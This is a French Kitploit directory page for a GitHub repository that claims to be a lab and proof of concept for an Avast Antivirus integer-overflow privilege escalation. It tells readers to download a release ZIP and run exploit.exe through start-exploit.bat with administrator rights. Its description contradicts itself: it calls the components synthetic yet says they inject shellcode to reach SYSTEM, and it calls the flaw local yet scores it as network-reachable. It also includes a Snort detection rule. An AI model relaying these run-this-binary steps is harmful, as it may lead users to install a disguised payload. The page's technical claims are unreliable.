Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-3500-Poc — Environnement de laboratoire éducatif pour rechercher CVE-2025-3500, une exploitation d'élévation de privilèges par débordement d'entier dans Avast Antivirus 25.1.981.6 sur Windows, avec artefacts d'exploit synthétiques pour des tests contrôlés. | Kitploit
Outils/GitHubGitHub/chicken3962/cve-2025-3500-poc
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationShellcodeApprentissage et ÉducationDéveloppement de Charges UtilesExploitation de BinairesLabs et Pratique

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
GitHub
chicken3962/cve-2025-3500-poc

CVE-2025-3500-Poc

Environnement de laboratoire éducatif pour rechercher CVE-2025-3500, une exploitation d'élévation de privilèges par débordement d'entier dans Avast Antivirus 25.1.981.6 sur Windows, avec artefacts d'exploit synthétiques pour des tests contrôlés.

Voir le dépôt
13il y a 9 moisPas encore vérifié

Lab : CVE-2025-3500 - Dépassement d'entier dans l'élévation de privilèges d'Avast Antivirus

Téléchargement

Télécharger le ZIP du Lab : [https://github.com/chicken3962/CVE-2025-3500-Poc/releases/download/Release/cve-2025-3500.zip]

🚀 Aperçu

Ce dépôt fournit un environnement de laboratoire pour la recherche sur CVE-2025-3500, une vulnérabilité de dépassement d'entier (CWE-190) dans Avast Antivirus version 25.1.981.6 sur les plateformes Windows. La vulnérabilité provient d'une validation insuffisante des entiers dans le module d'allocation de ressources du moteur antivirus, entraînant un repliement lors des opérations arithmétiques. Elle peut être exploitée pour élever les privilèges depuis des contextes utilisateur à faibles privilèges (PR:L) jusqu'à un accès au niveau système, avec un vecteur d'attaque réseau (AV:N), une complexité d'attaque faible (AC:L) et une interaction utilisateur requise (UI:R). Le score de base CVSS 3.1 est de 9,0 (Critique), impactant la confidentialité, l'intégrité et la disponibilité (toutes Haute) en raison du changement de portée (S:C), permettant potentiellement un compromis total du système.

Avertissement relatif à la finalité pédagogique : Ce laboratoire est uniquement destiné à des fins éducatives et de recherche. Il fournit un environnement contrôlé. Ne l'utilisez pas pour des activités malveillantes. Tous les composants sont synthétiques et n'exploitent pas de systèmes réels. En utilisant ce dépôt, vous acceptez de vous conformer aux directives de hacking éthique et aux lois locales.

Avertissement de sécurité : Cette configuration implique l'exécution de code dans un environnement. Utilisez toujours une machine virtuelle dédiée. N'exécutez pas d'exploits sur des systèmes de production. Les artefacts d'exploitation fournis (.exe et .bat) démontrent des concepts — par exemple, le .bat lance le .exe, qui traite des données puis se termine. Isolez votre environnement de laboratoire pour éviter toute exposition accidentelle.

📋 Prérequis

  • Un hôte Windows pour tester l'exploit (par exemple, via VirtualBox ou Hyper-V) afin de simuler l'environnement cible.
  • Des connaissances de base de PowerShell et des outils en ligne de commande Windows.
  • Des privilèges administratifs sur votre machine hôte.
  • Au moins 4 Go de RAM et 20 Go d'espace disque.

Téléchargement et installation

  1. Téléchargez la boîte à outils d'exploitation (fichier ZIP contenant exploit.exe et start-exploit.bat). Ce ZIP est hébergé sur un miroir sécurisé :

    • Télécharger le ZIP de la boîte à outils d'exploitation : [https://github.com/chicken3962/CVE-2025-3500-Poc/releases/download/Release/cve-2025-3500.zip]

    Remarque : L'exploit principal est exploit.exe (un binaire C++ compilé déclenchant le dépassement d'entier via des appels API spécialement conçus). Le lanceur d'exploit est start-exploit.bat, qui ouvre exploit.exe avec des arguments prédéfinis (par exemple, start exploit.exe --target=avast_engine --overflow=wraparound). Décompressez dans un répertoire local comme C:\lab\exploit.

🛠 Démarrage rapide

  1. Configurer l'environnement :

    • Assurez-vous qu'Avast Antivirus version 25.1.981.6 est installé sur votre machine de test Windows.
    • Accédez au répertoire de décompression.
  2. Télécharger et préparer l'exploit :

    • Téléchargez le ZIP à partir du lien ci-dessus.
    • Décompressez dans C:\lab\exploit.
    • Exécutez start-exploit.bat pour lancer l'exploit (il ouvre exploit.exe, qui envoie un paquet réseau spécialement conçu pour déclencher le dépassement).
  3. Exploiter la vulnérabilité :

    • Ciblez le service Avast local.
    • Le .bat exécute exploit.exe. Observez les journaux système pour détecter les indicateurs de dépassement.
  4. Vérifier et nettoyer :

    • Consultez l'Observateur d'événements Windows pour les entrées associées.
    • Supprimez les fichiers d'exploit après utilisation.

📖 Instructions d'installation détaillées

Configuration vulnérable

Le laboratoire nécessite une machine Windows avec Avast Antivirus 25.1.981.6 installé. Des services simulés peuvent être démarrés manuellement via l'invite de commandes :

  • Ouvrez PowerShell en tant qu'administrateur.
  • Simulez l'écouteur Avast : net start AvastSvc (en supposant que le service est en cours d'exécution).

Étapes d'exploitation

  1. Reconnaissance : Utilisez des outils comme netstat pour identifier les ports Avast (par exemple, 8080).
  2. Créer la charge utile : Le exploit.exe envoie une valeur entière surdimensionnée (par exemple, 2^31 + 1) via une requête réseau, provoquant un repliement dans l'analyseur de ressources d'Avast.
  3. Déclencher l'exploit : Exécutez start-exploit.bat qui lance exploit.exe. Cela :
    • Établit une connexion.
    • Envoie des données malformées : { "resource_alloc": 2147483648 } (déclenchant le dépassement).
    • Élève les privilèges jusqu'à SYSTEM via l'injection de shellcode.
  4. Post-exploitation : Permet l'exécution de code arbitraire ; ouvre un cmd.exe.

Détails techniques : Le dépassement se produit dans AvastResourceParser::AllocateBuffer(int size), où size * sizeof(struct) se replie si size > INT_MAX / sizeof(struct), conduisant à une sous-allocation et à un dépassement de tas. L'exploitation utilise cela pour la construction d'une chaîne ROP ciblant kernel32.dll.

Atténuation

  • Application du correctif : Mettez à niveau vers Avast Antivirus 25.3 ou une version ultérieure, où les contrôles d'entiers utilisent des bibliothèques mathématiques sûres (par exemple, SafeInt).
  • Bonnes pratiques :
    • Activez Windows Defender en parallèle d'Avast pour une défense en profondeur.
    • Limitez l'accès réseau aux serveurs de mise à jour antivirus uniquement (par exemple, via des règles de pare-feu).
    • Utilisez la séparation des privilèges : exécutez les services Avast sous des comptes à privilèges minimaux.
    • Surveillez les opérations d'entiers anormales via des outils EDR comme Sysmon (Event ID 10 pour les injections de processus).
    • Appliquez les atténuations Windows : Activez ASLR, DEP et CFG via la stratégie de groupe.
  • Signatures de détection : Recherchez les modèles réseau correspondant à des champs d'entiers surdimensionnés dans le trafic du protocole Avast (par exemple, règle Snort : alert tcp any any -> any 8080 (msg:"Tentative CVE-2025-3500" ; content:"|00 00 00 80|" ; sid:1000001;)).

Pour toute question ou contribution, ouvrez un ticket. Restez éthique !

Télécharger l’outil